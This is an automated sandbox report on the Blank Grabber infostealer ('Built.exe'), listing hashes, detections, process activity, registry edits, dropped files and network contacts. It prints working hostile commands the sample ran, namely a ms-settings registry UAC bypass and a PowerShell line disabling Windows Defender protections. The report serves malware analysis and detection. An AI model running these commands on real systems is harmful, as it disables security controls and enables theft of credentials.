File name:

Built.exe

Full analysis: https://app.any.run/tasks/16f7844e-ace9-46fb-957c-1362adc4cdaa
Verdict: Malicious activity
Threats:

Blank Grabber is an infostealer written in Python. It is designed to steal a wide array of data, such as browser login credentials, crypto wallets, Telegram sessions, and Discord tokens. It is an open-source malware, with its code available on GitHub and regularly receiving updates. Blank Grabber builder’s simple interface lets threat actors even with basic skills to deploy it and conduct attacks.

Analysis date: May 17, 2025, 04:25:52
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
uac
blankgrabber
stealer
python
screenshot
discord
evasion
Indicators:
MIME: application/vnd.microsoft.portable-executable
File info: PE32+ executable (GUI) x86-64, for MS Windows, 7 sections
MD5:

C5952FAF4C0691B2E074EAC8AFD10F62

SHA1:

7C9F2ED9D04D0DADC0170D0616C994CC9E493ECD

SHA256:

6094072560B57E31FE721F56DFE8447D0A60844988DB600B6002569F013E683E

SSDEEP:

98304:ACYzBTOO8ifqbgHKXs0K6VcCC6mgMx1o6IBczFq0crhH5ePqymwvqHi1VAJ8ZySj:qlaOXWdWnl

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Executing a file with an untrusted certificate

      • Built.exe (PID: 5364)
      • Built.exe (PID: 2320)
      • Built.exe (PID: 1184)
      • Built.exe (PID: 5256)
    • BlankGrabber has been detected

      • Built.exe (PID: 5364)
      • Built.exe (PID: 1184)
    • Bypass User Account Control (Modify registry)

      • reg.exe (PID: 920)
    • Bypass User Account Control (ComputerDefaults)

      • ComputerDefaults.exe (PID: 2340)
    • Adds path to the Windows Defender exclusion list

      • Built.exe (PID: 5256)
      • cmd.exe (PID: 4424)
    • Antivirus name has been found in the command line (generic signature)

      • cmd.exe (PID: 3240)
    • Changes Windows Defender settings

      • cmd.exe (PID: 4424)
      • cmd.exe (PID: 3240)
    • Changes settings for real-time protection

      • powershell.exe (PID: 1328)
    • Changes settings for checking scripts for malicious actions

      • powershell.exe (PID: 1328)
    • Changes settings for protection against network attacks (IPS)

      • powershell.exe (PID: 1328)
    • Changes settings for reporting to Microsoft Active Protection Service (MAPS)

      • powershell.exe (PID: 1328)
    • Changes Controlled Folder Access settings

      • powershell.exe (PID: 1328)
    • Changes settings for sending potential threat samples to Microsoft servers

      • powershell.exe (PID: 1328)
    • Actions looks like stealing of personal data

      • Built.exe (PID: 5256)
    • Steals credentials from Web Browsers

      • Built.exe (PID: 5256)
    • Changes antivirus protection settings for downloading files from the Internet (IOAVProtection)

      • powershell.exe (PID: 1328)
    • Bypass execution policy to execute commands

      • powershell.exe (PID: 7920)
    • Changes powershell execution policy (Bypass)

      • cmd.exe (PID: 7588)
    • Resets Windows Defender malware definitions to the base version

      • MpCmdRun.exe (PID: 8112)
    • BLANKGRABBER has been detected (SURICATA)

      • Built.exe (PID: 5256)
    • Starts CMD.EXE for self-deleting

      • Built.exe (PID: 5256)
  • SUSPICIOUS

    • Process drops legitimate windows executable

      • Built.exe (PID: 5364)
      • Built.exe (PID: 1184)
    • Application launched itself

      • Built.exe (PID: 5364)
      • Built.exe (PID: 1184)
    • Starts a Microsoft application from unusual location

      • Built.exe (PID: 2320)
      • Built.exe (PID: 5364)
      • Built.exe (PID: 1184)
      • Built.exe (PID: 5256)
    • Process drops python dynamic module

      • Built.exe (PID: 5364)
      • Built.exe (PID: 1184)
    • The process drops C-runtime libraries

      • Built.exe (PID: 5364)
      • Built.exe (PID: 1184)
    • Executable content was dropped or overwritten

      • Built.exe (PID: 5364)
      • Built.exe (PID: 1184)
      • csc.exe (PID: 8144)
    • Uses REG/REGEDIT.EXE to modify registry

      • cmd.exe (PID: 720)
      • cmd.exe (PID: 5892)
      • cmd.exe (PID: 5960)
    • Changes default file association

      • reg.exe (PID: 920)
    • Found strings related to reading or modifying Windows Defender settings

      • Built.exe (PID: 2320)
      • Built.exe (PID: 5256)
    • Uses WEVTUTIL.EXE to query events from a log or log file

      • cmd.exe (PID: 1672)
      • cmd.exe (PID: 1764)
    • Starts CMD.EXE for commands execution

      • Built.exe (PID: 5256)
      • Built.exe (PID: 2320)
    • Script adds exclusion path to Windows Defender

      • cmd.exe (PID: 4424)
    • Starts POWERSHELL.EXE for commands execution

      • cmd.exe (PID: 4424)
      • cmd.exe (PID: 3240)
      • cmd.exe (PID: 7288)
      • cmd.exe (PID: 7588)
      • cmd.exe (PID: 7268)
      • cmd.exe (PID: 8048)
      • cmd.exe (PID: 7236)
      • cmd.exe (PID: 2772)
    • Loads Python modules

      • Built.exe (PID: 5256)
    • Script disables Windows Defender's real-time protection

      • cmd.exe (PID: 3240)
    • Script disables Windows Defender's IPS

      • cmd.exe (PID: 3240)
    • Uses ATTRIB.EXE to modify file attributes

      • cmd.exe (PID: 5376)
    • Get information on the list of running processes

      • Built.exe (PID: 5256)
      • cmd.exe (PID: 4400)
      • cmd.exe (PID: 7296)
      • cmd.exe (PID: 4696)
    • Uses NETSH.EXE to obtain data on the network

      • cmd.exe (PID: 7356)
    • Uses SYSTEMINFO.EXE to read the environment

      • cmd.exe (PID: 7396)
    • Base64-obfuscated command line is found

      • cmd.exe (PID: 7588)
    • BASE64 encoded PowerShell command has been detected

      • cmd.exe (PID: 7588)
    • The process bypasses the loading of PowerShell profile settings

      • cmd.exe (PID: 7588)
    • Uses WMIC.EXE to obtain Windows Installer data

      • cmd.exe (PID: 7176)
      • cmd.exe (PID: 7668)
    • Starts application with an unusual extension

      • cmd.exe (PID: 7316)
      • cmd.exe (PID: 8084)
      • cmd.exe (PID: 4188)
      • cmd.exe (PID: 7896)
      • cmd.exe (PID: 976)
      • cmd.exe (PID: 7356)
    • Accesses antivirus product name via WMI (SCRIPT)

      • WMIC.exe (PID: 7652)
    • CSC.EXE is used to compile C# code

      • csc.exe (PID: 8144)
    • Captures screenshot (POWERSHELL)

      • powershell.exe (PID: 7920)
    • The executable file from the user directory is run by the CMD process

      • rar.exe (PID: 7720)
    • Uses WMIC.EXE to obtain operating system information

      • cmd.exe (PID: 7548)
    • Accesses product unique identifier via WMI (SCRIPT)

      • WMIC.exe (PID: 8092)
    • Accesses operating system name via WMI (SCRIPT)

      • WMIC.exe (PID: 8020)
    • Uses WMIC.EXE to obtain computer system information

      • cmd.exe (PID: 7496)
    • Checks for external IP

      • Built.exe (PID: 5256)
      • svchost.exe (PID: 2196)
    • Hides command output

      • cmd.exe (PID: 5740)
    • Runs PING.EXE to delay simulation

      • cmd.exe (PID: 5740)
    • Uses WMIC.EXE to obtain a list of video controllers

      • cmd.exe (PID: 7340)
    • Accesses video controller name via WMI (SCRIPT)

      • WMIC.exe (PID: 5984)
  • INFO

    • The sample compiled with english language support

      • Built.exe (PID: 5364)
      • Built.exe (PID: 1184)
    • Reads the computer name

      • Built.exe (PID: 5364)
      • Built.exe (PID: 1184)
      • Built.exe (PID: 5256)
      • MpCmdRun.exe (PID: 8112)
    • Checks supported languages

      • Built.exe (PID: 5364)
      • Built.exe (PID: 2320)
      • Built.exe (PID: 1184)
      • Built.exe (PID: 5256)
      • tree.com (PID: 7868)
      • tree.com (PID: 5404)
      • tree.com (PID: 6040)
      • tree.com (PID: 7504)
      • tree.com (PID: 6388)
      • cvtres.exe (PID: 7560)
      • tree.com (PID: 8048)
      • csc.exe (PID: 8144)
      • MpCmdRun.exe (PID: 8112)
      • rar.exe (PID: 7720)
    • Create files in a temporary directory

      • Built.exe (PID: 5364)
      • Built.exe (PID: 2320)
      • Built.exe (PID: 1184)
      • Built.exe (PID: 5256)
      • cvtres.exe (PID: 7560)
      • csc.exe (PID: 8144)
      • MpCmdRun.exe (PID: 8112)
      • rar.exe (PID: 7720)
    • Reads the machine GUID from the registry

      • Built.exe (PID: 2320)
      • Built.exe (PID: 5256)
      • csc.exe (PID: 8144)
      • rar.exe (PID: 7720)
    • Reads security settings of Internet Explorer

      • ComputerDefaults.exe (PID: 2340)
      • WMIC.exe (PID: 7652)
      • WMIC.exe (PID: 8020)
      • WMIC.exe (PID: 8156)
      • WMIC.exe (PID: 8092)
      • WMIC.exe (PID: 5984)
    • Checks the directory tree

      • tree.com (PID: 7868)
      • tree.com (PID: 5404)
      • tree.com (PID: 6040)
      • tree.com (PID: 7504)
      • tree.com (PID: 6388)
      • tree.com (PID: 8048)
    • The Powershell gets current clipboard

      • powershell.exe (PID: 7716)
    • Checks if a key exists in the options dictionary (POWERSHELL)

      • powershell.exe (PID: 4620)
      • powershell.exe (PID: 1328)
    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 8116)
      • powershell.exe (PID: 4620)
      • powershell.exe (PID: 1328)
      • powershell.exe (PID: 6476)
    • Displays MAC addresses of computer network adapters

      • getmac.exe (PID: 7616)
    • Attempting to use instant messaging service

      • svchost.exe (PID: 2196)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.exe | Win64 Executable (generic) (87.3)
.exe | Generic Win/DOS Executable (6.3)
.exe | DOS Executable Generic (6.3)

EXIF

EXE

MachineType: AMD AMD64
TimeStamp: 2025:05:17 04:25:25+00:00
ImageFileCharacteristics: Executable, Large address aware
PEType: PE32+
LinkerVersion: 14.43
CodeSize: 173568
InitializedDataSize: 95232
UninitializedDataSize: -
EntryPoint: 0xce30
OSVersion: 6
ImageVersion: -
SubsystemVersion: 6
Subsystem: Windows GUI
FileVersionNumber: 10.0.19041.5369
ProductVersionNumber: 10.0.19041.5369
FileFlagsMask: 0x003f
FileFlags: (none)
FileOS: Windows NT 32-bit
ObjectFileType: Executable application
FileSubtype: -
LanguageCode: English (U.S.)
CharacterSet: Unicode
CompanyName: Microsoft Corporation
FileDescription: BDE UI Launcher
FileVersion: 10.0.19041.5369 (WinBuild.160101.0800)
InternalName: BDEUISRV.DLL
LegalCopyright: © Microsoft Corporation. All rights reserved.
OriginalFileName: BDEUISRV.DLL
ProductName: Microsoft® Windows® Operating System
ProductVersion: 10.0.19041.5369
No data.
screenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
247
Monitored processes
118
Malicious processes
10
Suspicious processes
4

Behavior graph

Click at the process to see the details
start #BLANKGRABBER built.exe built.exe no specs cmd.exe no specs conhost.exe no specs reg.exe no specs cmd.exe no specs conhost.exe no specs reg.exe no specs cmd.exe no specs conhost.exe no specs wevtutil.exe no specs cmd.exe no specs conhost.exe no specs computerdefaults.exe no specs computerdefaults.exe no specs sppextcomobj.exe no specs slui.exe no specs computerdefaults.exe #BLANKGRABBER built.exe cmd.exe no specs conhost.exe no specs wevtutil.exe no specs cmd.exe no specs conhost.exe no specs reg.exe no specs #BLANKGRABBER built.exe cmd.exe no specs cmd.exe no specs cmd.exe no specs conhost.exe no specs conhost.exe no specs conhost.exe no specs powershell.exe no specs powershell.exe no specs attrib.exe no specs cmd.exe no specs cmd.exe no specs conhost.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs conhost.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs conhost.exe no specs tasklist.exe no specs tasklist.exe no specs cmd.exe no specs cmd.exe no specs conhost.exe no specs conhost.exe no specs wmic.exe no specs powershell.exe no specs netsh.exe no specs systeminfo.exe no specs tasklist.exe no specs tree.com no specs reg.exe no specs powershell.exe no specs cmd.exe no specs conhost.exe no specs tree.com no specs cmd.exe no specs conhost.exe no specs tree.com no specs cmd.exe no specs conhost.exe no specs tree.com no specs cmd.exe no specs conhost.exe no specs tree.com no specs cmd.exe no specs conhost.exe no specs tree.com no specs cmd.exe no specs conhost.exe no specs powershell.exe no specs tiworker.exe no specs csc.exe cvtres.exe no specs cmd.exe no specs conhost.exe no specs powershell.exe no specs mpcmdrun.exe no specs cmd.exe no specs conhost.exe no specs getmac.exe no specs cmd.exe no specs conhost.exe no specs rar.exe no specs cmd.exe no specs conhost.exe no specs wmic.exe no specs cmd.exe no specs conhost.exe no specs wmic.exe no specs cmd.exe no specs conhost.exe no specs wmic.exe no specs cmd.exe no specs conhost.exe no specs powershell.exe no specs cmd.exe no specs conhost.exe no specs wmic.exe no specs cmd.exe no specs conhost.exe no specs powershell.exe no specs svchost.exe cmd.exe no specs conhost.exe no specs ping.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
720C:\WINDOWS\system32\cmd.exe /c "reg add hkcu\Software\Classes\ms-settings\shell\open\command /d "C:\Users\admin\AppData\Local\Temp\Built.exe" /f"C:\Windows\System32\cmd.exeBuilt.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
920reg add hkcu\Software\Classes\ms-settings\shell\open\command /v "DelegateExecute" /fC:\Windows\System32\reg.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Registry Console Tool
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\reg.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
960\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
976C:\WINDOWS\system32\cmd.exe /c "tree /A /F"C:\Windows\System32\cmd.exeBuilt.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
c:\windows\system32\bcrypt.dll
1056\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
1096\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
1164wevtutil qe "Microsoft-Windows-Windows Defender/Operational" /f:textC:\Windows\System32\wevtutil.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Eventing Command Line Utility
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\wevtutil.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\combase.dll
1184"C:\Users\admin\AppData\Local\Temp\Built.exe" C:\Users\admin\AppData\Local\Temp\Built.exe
ComputerDefaults.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
BDE UI Launcher
Exit code:
0
Version:
10.0.19041.5369 (WinBuild.160101.0800)
Modules
Images
c:\users\admin\appdata\local\temp\built.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
1272\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
1328powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend C:\Windows\System32\WindowsPowerShell\v1.0\powershell.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
Total events
54 245
Read events
54 233
Write events
8
Delete events
4

Modification events

(PID) Process:(920) reg.exeKey:HKEY_CLASSES_ROOT\ms-settings\shell\open\command
Operation:writeName:DelegateExecute
Value:
(PID) Process:(2340) ComputerDefaults.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer
Operation:writeName:SlowContextMenuEntries
Value:
6024B221EA3A6910A2DC08002B30309D0A010000BD0E0C47735D584D9CEDE91E22E23282770100000114020000000000C0000000000000468D0000006078A409B011A54DAFA526D86198A780390100009AD298B2EDA6DE11BA8CA68E55D895936E000000
(PID) Process:(2340) ComputerDefaults.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content
Operation:writeName:CachePrefix
Value:
(PID) Process:(2340) ComputerDefaults.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
Operation:writeName:CachePrefix
Value:
Cookie:
(PID) Process:(2340) ComputerDefaults.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History
Operation:writeName:CachePrefix
Value:
Visited:
(PID) Process:(5548) reg.exeKey:HKEY_CLASSES_ROOT\ms-settings\shell\open\command
Operation:delete keyName:(default)
Value:
(PID) Process:(5548) reg.exeKey:HKEY_CLASSES_ROOT\ms-settings\shell\open
Operation:delete keyName:(default)
Value:
(PID) Process:(5548) reg.exeKey:HKEY_CLASSES_ROOT\ms-settings\shell
Operation:delete keyName:(default)
Value:
(PID) Process:(5548) reg.exeKey:HKEY_CLASSES_ROOT\ms-settings
Operation:delete keyName:(default)
Value:
(PID) Process:(5256) Built.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Multimedia\DrawDib
Operation:writeName: 1280x720x32(BGR 0)
Value:
31,31,31,31
Executable files
37
Suspicious files
28
Text files
35
Unknown types
0

Dropped files

PID
Process
Filename
Type
5364Built.exeC:\Users\admin\AppData\Local\Temp\_MEI53642\_ctypes.pydexecutable
MD5:69CA8C196FF662DFA9D0BFA8B2472325
SHA256:C703676858F6DA01E9D8648B35B4C33A7B323E19ECBC2816051B4E37531BA54C
5364Built.exeC:\Users\admin\AppData\Local\Temp\_MEI53642\_lzma.pydexecutable
MD5:424EEC0E3492EE58562F8B92591A6AA7
SHA256:6AEAE844143F9062684C8348212C3C4BB62EF18AD423F769D2FE12E10FA616D8
5364Built.exeC:\Users\admin\AppData\Local\Temp\_MEI53642\_hashlib.pydexecutable
MD5:6E6B2F0E5C7CBB740879E9784D5E71AF
SHA256:C74DD7056AAC0F359AF00954868DAF4F3A9D2D99F38C27F4971DE9D0F24E549C
5364Built.exeC:\Users\admin\AppData\Local\Temp\_MEI53642\_decimal.pydexecutable
MD5:5FDD63C44C1C97D2D40145219ACC3F6C
SHA256:45E619386AB8220F5FB3195E85A0389606E4E4CF926765D7EA4A82294341335E
5364Built.exeC:\Users\admin\AppData\Local\Temp\_MEI53642\libcrypto-1_1.dllexecutable
MD5:3CC020BACEAC3B73366002445731705A
SHA256:D1AA265861D23A9B76F16906940D30F3A65C5D0597107ECB3D2E6D470B401BB8
5364Built.exeC:\Users\admin\AppData\Local\Temp\_MEI53642\rarreg.keytext
MD5:4531984CAD7DACF24C086830068C4ABE
SHA256:58209C8AB4191E834FFE2ECD003FD7A830D3650F0FD1355A74EB8A47C61D4211
5364Built.exeC:\Users\admin\AppData\Local\Temp\_MEI53642\blank.aesbinary
MD5:5D1A1DF2C439E5BE44E591D95D893D89
SHA256:C7F64DDD41A4010EF8839091214F70D94BBABD1AAE797F3AAE0E90871091967F
5364Built.exeC:\Users\admin\AppData\Local\Temp\_MEI53642\libffi-7.dllexecutable
MD5:6F818913FAFE8E4DF7FEDC46131F201F
SHA256:3F94EE4F23F6C7702AB0CC12995A6457BF22183FA828C30CC12288ADF153AE56
5364Built.exeC:\Users\admin\AppData\Local\Temp\_MEI53642\python310.dllexecutable
MD5:76CB307E13FBBFB9E466458300DA9052
SHA256:95066C06D9ED165F0B6F34079ED917DF1111BD681991F96952D9EE35D37DC615
5364Built.exeC:\Users\admin\AppData\Local\Temp\_MEI53642\libssl-1_1.dllexecutable
MD5:7F77A090CB42609F2EFC55DDC1EE8FD5
SHA256:47B63A9370289D2544ABC5A479BFB27D707AE7DB4F3F7B6CC1A8C8F57FD0CF1F
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
6
TCP/UDP connections
21
DNS requests
14
Threats
8

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
GET
200
184.30.21.171:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
6544
svchost.exe
GET
200
2.17.190.73:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
GET
200
23.216.77.6:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
1676
SIHClient.exe
GET
200
184.30.21.171:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
unknown
whitelisted
1676
SIHClient.exe
GET
200
184.30.21.171:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
unknown
whitelisted
5256
Built.exe
GET
200
208.95.112.1:80
http://ip-api.com/json/?fields=225545
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
20.73.194.208:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
4
System
192.168.100.255:138
whitelisted
23.216.77.6:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
184.30.21.171:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted
3216
svchost.exe
172.211.123.248:443
client.wns.windows.com
MICROSOFT-CORP-MSN-AS-BLOCK
FR
whitelisted
5256
Built.exe
142.250.185.227:443
gstatic.com
GOOGLE
US
whitelisted
6544
svchost.exe
40.126.32.133:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
4
System
192.168.100.255:137
whitelisted
6544
svchost.exe
2.17.190.73:80
ocsp.digicert.com
AKAMAI-AS
DE
whitelisted
2104
svchost.exe
20.73.194.208:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 20.73.194.208
whitelisted
crl.microsoft.com
  • 23.216.77.6
  • 23.216.77.28
whitelisted
google.com
  • 142.250.186.78
whitelisted
www.microsoft.com
  • 184.30.21.171
whitelisted
client.wns.windows.com
  • 172.211.123.248
whitelisted
gstatic.com
  • 142.250.185.227
whitelisted
login.live.com
  • 40.126.32.133
  • 20.190.160.5
  • 40.126.32.136
  • 20.190.160.128
  • 20.190.160.65
  • 40.126.32.134
  • 40.126.32.140
  • 40.126.32.72
whitelisted
ocsp.digicert.com
  • 2.17.190.73
whitelisted
slscr.update.microsoft.com
  • 172.202.163.200
whitelisted
fe3cr.delivery.mp.microsoft.com
  • 52.165.164.15
whitelisted

Threats

PID
Process
Class
Message
2196
svchost.exe
Device Retrieving External IP Address Detected
INFO [ANY.RUN] External IP Check (ip-api .com)
5256
Built.exe
Device Retrieving External IP Address Detected
ET INFO External IP Lookup ip-api.com
2196
svchost.exe
Misc activity
ET INFO Observed Discord Domain in DNS Lookup (discord .com)
2196
svchost.exe
Device Retrieving External IP Address Detected
ET INFO External IP Lookup Domain in DNS Lookup (ip-api .com)
5256
Built.exe
A Network Trojan was detected
STEALER [ANY.RUN] BlankGrabber (SkochGrabber) Generic External IP Check
2196
svchost.exe
Misc activity
ET INFO Discord Chat Service Domain in DNS Lookup (discord .com)
5256
Built.exe
Misc activity
ET INFO Observed Discord Domain (discord .com in TLS SNI)
5256
Built.exe
Misc activity
ET INFO Observed Discord Service Domain (discord .com) in TLS SNI
No debug info